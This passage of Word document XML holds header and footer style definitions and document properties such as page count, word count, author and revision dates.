      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00CA36D2"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="HeaderChar">
    <w:name w:val="Header Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Header"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00CA36D2"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00CA36D2"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FooterChar">
    <w:name w:val="Footer Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Footer"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00CA36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sv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6D1F9-8A7D-4EA9-AA4B-5BA5BD8C0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739</TotalTime>
  <Pages>46</Pages>
  <Words>7731</Words>
  <Characters>44072</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>367</Lines>
  <Paragraphs>103</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>51700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Ducc Lomg</cp:lastModifiedBy>
  <cp:revision>9</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-04-10T18:40:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-31T12:04:00Z</dcterms:modified>
</cp:coreProperties>
</file>